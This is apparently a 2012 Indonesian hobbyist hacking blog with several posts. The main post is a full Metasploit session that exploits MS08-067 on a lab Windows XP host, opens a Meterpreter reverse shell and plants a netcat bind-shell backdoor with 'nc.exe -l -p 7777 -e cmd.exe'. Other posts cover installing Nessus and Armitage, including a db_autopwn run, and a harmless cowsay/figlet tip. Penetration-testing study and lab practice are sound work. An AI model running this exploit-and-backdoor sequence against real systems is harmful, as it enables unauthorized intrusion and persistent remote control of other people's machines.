Tuesday, January 31, 2012

Metasploit dengan Netcat


msf > use  exploit/windows/smb/ms08_067_netapi 
                               set PAYLOADS winodws/meterpreter/reverse_tcp
PAYLOADS => winodws/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.2     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:1038) at 2011-07-03 00:45:42 +0700


meterpreter > upload /root/Desktop/nc.exe c:\\
[*] uploading  : /root/Desktop/nc.exe -> c:\
[*] uploaded   : /root/Desktop/nc.exe -> c:\\nc.exe
meterpreter > shell
Process 576 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>cls
cls


C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78F1-F486

 Directory of C:\

06/26/2011  12:49 AM                 0 AUTOEXEC.BAT
06/26/2011  12:49 AM                 0 CONFIG.SYS
06/26/2011  05:45 PM    <DIR>          Documents and Settings
07/03/2011  01:19 AM            59,392 nc.exe
06/26/2011  01:01 AM    <DIR>          Program Files
06/29/2011  03:31 AM    <DIR>          rain
06/29/2011  03:33 AM    <DIR>          uun
06/29/2011  12:49 AM    <DIR>          WINDOWS
               3 File(s)         59,392 bytes
               5 Dir(s)   3,695,656,960 bytes free

C:\>nc.exe
nc.exe
Cmd line:
no port[s] to connect to

C:\>nc.exe -l -p 7777 -e cmd.exe
nc.exe -l -p 7777 -e cmd.exe

[root@Novemberain][~]
[#] nc 192.168.56.2 7777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

C:\>netstat -an
netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.56.2:139       0.0.0.0:0              LISTENING
  TCP    192.168.56.2:1034      192.168.56.1:4444      CLOSE_WAIT
  TCP    192.168.56.2:7777      192.168.56.1:47816     ESTABLISHED


CARA INSTALL NESSUS DI UBUNTU


OK SEKARNG KITA MULAI.....

PERTAMA

 1  DOWLAOD FILE DEB NYA DI  --------->>  http://www.nessus.org/products/nessus/nessus-download-agreement

 TRUUS CARI YANG TULISAN ubuntu1010_i386.deb



2.KALAU SUDA DI DOWLAOD PINDAH KAN FILE DEB ITU DI DIRECTORY HOME ATAU DE DESTOP KALAU SAYA DI DESTOP TRUUS MASUK KE HOME ATAU DESTOP TERGANTUNG KITA TARUH NYA DMNA KALAU ...



 3  TRUUS MSUK KE DIREKTORY DESTOP  DN KETIK PERINTAH uun@JH:~$ cd Destop

uun@JH:~/Destop$ sudo dpkg -i Nessus-4.4.1-ubuntu1010_i386.deb

(Sedang membaca basis data ...305958 berkas dan direktori telah terpasang.)

Bersiap-siap mengganti nessus 4.4.1 (dengan Nessus-4.4.1-ubuntu1010_i386.deb) ...

$Shutting down Nessus : kill: 59: No such process



.

Sedang membuka pengganti nessus ...

Sedang menyetel nessus (4.4.1) ...



 - Please run /opt/nessus/sbin/nessus-adduser to add a user

 - Register your Nessus scanner at http://www.nessus.org/register/ to obtain

   all the newest plugins

 - You can start nessusd by typing /etc/init.d/nessusd start



Processing triggers for ureadahead ...

ureadahead will be reprofiled on next reboot

NAH KALAU BERHASIL KAYA DI ATAS HEHEEHE ..



 4. NAH  TRUUS DAFTAR  BIS DFATRA CONFERMASI DI YAHOO http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code



 KALAU UDAH MASUK KE ROOT root@JH][~]

[#] /opt/nessus/sbin/nessus-adduser



Login : novemberain<--------------GANTI BISA PAKAI NAMA ANDA

Login password :

Login password (again) :

Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y

User rules

----------

nessusd has a rules system which allows you to restrict the hosts

that 22021990 has the right to test. For instance, you may want

him to be able to scan his own host only.



Please see the nessus-adduser manual for the rules syntax



Enter the rules for this user, and enter a BLANK LINE once you are done :

(the user can have an empty rules set)





Login             : 22021990

Password         : ***********

This user will have 'admin' privileges within the Nessus server

Rules             :

Is that ok ? (y/n) [y] y

User added



[root@JH][~]



[#] /opt/nessus/bin/nessus-fetch --register FE61-E9C1-1A67-99B0-7569 <--------------- itu adalah plugins dari nessus nanti ada di yahoo pas di email nya ok

Your activation code has been registered properly - thank you.

Now fetching the newest plugin set from plugins.nessus.org...



7.   NAH KALAU UDAH TINGGAL UPDATE  /etc/init.d/nessusd start





8. NAH TINGGAL BUKA BROWESER N  TINGGAL LOGIN HEHEH    https://127.0.0.1:8834/


Monday, January 30, 2012

CARA INSTALL ARMITAGE DI UBUNTU





novemberain@jh:~$sudo apt-get install armitage

novemberain@jh:~$sudo apt-get install postgresql

novemberain@jh:~$sudo apt-get install libpgsql-ruby

novemberain@jh:~$sudo su postgres

sekarng kita configurasi database nya

postgres@jh:~$createuser novemberain -P

Enter password for new role:

Enter it again:

Shall the new role be a superuser? (y/n) n

Shall the new role be allowed to create databases? (y/n) n

Shall the new role be allowed to create more new roles? (y/n) n

postgres@jh:~$createdb --owner=novemberain metasploit3

postgres@jh:~$exit

nah truus kita masuk ke msfconsole kalau sudah msuk kita configurasi di msf

msf > db_driver postgresql

msf > db_connect novemberain:password@127.0.0.1:5432/metasploit3

msf > db_workspace -a MyProject

nah nie Autopwn

msf > db_nmap 192.168.1.1

msf > db_autopwn -p -e -q

kalau suda selesai kita coba bikin auto start atau pas kita login ke leptop atau komputer n kita masuk ke armitage da ada tinggal pakai hehhe

novemberain@jh:~$ cat > ~/.msf3/msfconsole.rc

truus isikan

db_driver postgresql

db_connect novemberain:[password]@127.0.0.1:5432/metasploit3

db_workspace -a MyProject

save dengan ctrl+s

kalau sudah truus....kita update dulu msf nya

novemberain@jh:~$sudo  msfupdate

kalau sudah buka armitage di terminal

novemberain@jh:~$ cd /pentest/exploits/armitage/

kalau suda masuk tinggal tulis ./armitage.sh  nanati akan keluar armitage nya

truus buka terminal satu lagi novemberain@jh:~$ msfrpcd -f -U msf -P test -t Basic

CARA MEMPERCANTIK TERMINAL LINUX

  

Cowsay atau cowthink adalah bentuk aplikasi yang akan mengubah teks biasa menjadi bentuk balon dialog dengan pelaku hewan sapi lucu berbentuk ASCII pada jendela prompt
 
Figlet ( Frank, Ian and Glenn�s Letter ) adalah suatu aplikasi yang dapat digunakan untuk membentuk suatu karakter khusus dan unik pada console atau jendela prompt


install figlet  
novemberain@Tux-family:~$ sudo apt-get install figlet
[sudo] password for novemberain:
Reading package lists... Done
Building dependency tree      
Reading state information... Done
figlet is already the newest version.
The following packages were automatically installed and are no longer required:
  bamfdaemon python-nltk python-lxml libyaml-0-2 python-scapy python-yaml libbamf0
Use 'apt-get autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 9 not upgraded. <----- sudah terinstall 


yang kedua ... install cowsay
novemberain@Tux-family:~$ sudo apt-get install cowsay
Reading package lists... Done
Building dependency tree      
Reading state information... Done
cowsay is already the newest version.
The following packages were automatically installed and are no longer required:
  bamfdaemon python-nltk python-lxml libyaml-0-2 python-scapy python-yaml libbamf0
Use 'apt-get autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 9 not upgraded.<---- sudah terinstall 


kalau sudah terinstall buka terminal ketik ...

novemberain@Tux-family:~$ sudo gedit .bashrc  
maka akan seperti gambar di bawah ini ..


kalau sudah masukan script berikut  taruh paling bawah sebelum nya di edit dulu script nya kalau sudah save ok
fi
# Modification Terminal
cowsay -f dragon "SELAMAT DATANG DI TUX-FAMILY INDONESIAN"
echo
#Figlet nama
figlet -f smslant "NOVEMBER RAIN"
keterangan cowsay -f DRAGON <-------- bisa di ganti dengan gambar apa aja ....
"SELAMAT DATANG DI TUX-FAMILY INDONESIAN" <---- bisa di ganti dengan kata apa aja ...
figlet -f smslant "NOVEMBER RAIN" <-----------ganti tersetrah kamu nama nya :)
maka akan seperti gambar terminal linux saya 

nah kalau mau ganti gambar nya edit di sini ...
novemberain@Tux-family:~$ cd /usr/share/cowsay/cows/
novemberain@Tux-family:/usr/share/cowsay/cows$ ls
apt.cow         cock.cow            elephant.cow           hellokitty.cow    meow.cow       skeleton.cow         turkey.cow
beavis.zen.cow  cower.cow           elephant-in-snake.cow  kiss.cow          milk.cow       snowman.cow          turtle.cow
bong.cow        daemon.cow          eyes.cow               kitty.cow         moofasa.cow    sodomized-sheep.cow  tux.cow
bud-frogs.cow   default.cow         flaming-sheep.cow      koala.cow         moose.cow      stegosaurus.cow      vader.cow
bunny.cow       dragon-and-cow.cow  ghostbusters.cow       kosh.cow          mutilated.cow  stimpy.cow           vader-koala.cow
calvin.cow      dragon.cow          gnu.cow                luke-koala.cow    ren.cow        suse.cow             www.cow
cheese.cow      duck.cow            head-in.cow            mech-and-cow.cow  sheep.cow      three-eyes.cow





nah tinggal pilih aja yang mana mau anda suka ...buat gambar di terminal anda ....
ok sampai di sini dulu .... selamat mencoba :)